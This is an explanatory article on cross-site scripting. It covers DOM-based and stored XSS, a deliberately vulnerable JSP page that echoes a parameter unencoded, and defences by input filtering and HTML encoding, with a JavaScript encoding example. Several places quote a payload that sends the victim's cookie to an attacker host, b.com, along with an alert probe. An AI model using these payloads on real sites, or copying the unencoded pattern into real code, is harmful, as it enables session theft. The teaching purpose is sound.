XSS, also written CSS (Cross Site Script), is cross-site scripting. A malicious attacker inserts malicious HTML code into a Web page; when a user views that page, the HTML code embedded in it is executed by the user's browser, and the attacker thereby achieves his purpose. The harm of an XSS attack comes from the fact that the injected script runs in the victim's browser with the rights of the page it was injected into, so it can, for example, read and send away the user's Cookie.
XSS classification
XSS is similar to a SQL injection attack: in both cases attacker-controlled input is treated as code. XSS can be divided into two kinds, DOM Based XSS and Stored XSS. Any place where content written by users is displayed to other users carries XSS risk, because that content may contain a script.
DOM Based XSS
DOM Based XSS is XSS based on the DOM or on the local page: the malicious script is not stored on the server but is carried in the request (for example in the URL), and it executes when the page writes that data into its own DOM.
Scenario
Suppose a.com has a page that displays whatever is passed in the url parameter content. The JSP code is as follows; the second marked line in the body is the place where the parameter is written into the page.

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>XSS test</title>
</head>
<body>
<%-- The request parameter is written into the page as-is, without any encoding: this is the XSS point --%>
Content: <%=request.getParameter("content")%>
</body>
</html>

Suppose an attacker wants to obtain other users' information (for example the Cookie they hold after logging in). He constructs the link http://www.a.com?content=<script>window.open("www.b.com?param="+document.cookie)</script> and gets a user, Tom, to open it (for example by posting it on a.com itself). When Tom opens the link while logged in to a.com, the page writes the script into its body, Tom's browser runs it, and the script opens b.com with Tom's a.com cookie passed as a parameter. b.com is the attacker's server and records the cookie; with Tom's a.com cookie the attacker can act as Tom on a.com. During testing, a simple way to check whether a page is affected is to open a.com?content=<script>alert("xss")</script>: if a dialog showing xss pops up, the parameter is written into the page unencoded and the page is vulnerable.
Stored XSS
Stored XSS is stored cross-site scripting: the attack script is saved on the server side (for example in the database) and is delivered to every user who views the stored content.
Scenario
Suppose a.com lets users post articles. An attacker posts an article whose body contains <script>window.open("www.b.com?param="+document.cookie)</script>. The article is saved on the server, so every time users such as Tom and Jack open it, the script runs in their browsers and sends their a.com cookie to the attacker's site, with no need to get them to click a specially crafted link.
The harm of Stored XSS is greater than the harm of the previous kind, because one stored script reaches every reader of the content.
XSS defence
Attack and defence are always at odds, and no single measure blocks every possible attack, but the following methods reduce XSS risk.
Input filtering
Filter what the user submits before it is stored or processed, so that content written by a user cannot carry script or other markup the application does not expect.
Html encode
In some cases the content must be kept as the user entered it, and filtering on input is not enough. In that case HTML-encode the content at the point where it is written into the page, so that characters such as < and > become entities and the browser displays the content as text instead of executing it.
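The Html encode defence applied to the reflected content parameter, as an added example that is not part of the original article: a JavaScript htmlEncode function run over the two payloads the article quotes (the cookie-stealing link from the DOM Based XSS scenario and the alert("xss") probe), beside the unencoded rendering that the JSP page above performs. The renderUnsafe and renderSafe functions and the page layout are constructed stand-ins for the JSP body, not the article's code.

```javascript
// Added example, not code from the original article.
// Characters that change meaning inside HTML text or a double-quoted
// attribute value, and the entity reference each one becomes.
const HTML_ENTITIES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Html encode: replace every special character with its entity so the
// browser renders the input as text instead of parsing it as markup.
function htmlEncode(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// What the vulnerable JSP does: the raw parameter is concatenated into
// the page body (constructed stand-in for the JSP output).
function renderUnsafe(content) {
  return `<body>Content: ${content}</body>`;
}

// The fixed version: encode on output, at the point the value enters HTML.
function renderSafe(content) {
  return `<body>Content: ${htmlEncode(content)}</body>`;
}

// Crude check used only to show the difference between the two renderings:
// does the produced HTML contain an actual <script> start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The two payloads quoted in the article.
const PROBE = '<script>alert("xss")</script>';
const COOKIE_THEFT =
  '<script>window.open("www.b.com?param="+document.cookie)</script>';

for (const payload of [PROBE, COOKIE_THEFT]) {
  console.log("unsafe:", renderUnsafe(payload),
              "| script tag present:", containsScriptTag(renderUnsafe(payload)));
  console.log("safe  :", renderSafe(payload),
              "| script tag present:", containsScriptTag(renderSafe(payload)));
}
```

Entity encoding is the right escape only for HTML text and quoted attribute values, which is the context the JSP page writes into. A value placed inside a URL, a script block, or a style property needs that context's own escaping, so the encoding must be chosen by where the value lands in the page, not applied once on input.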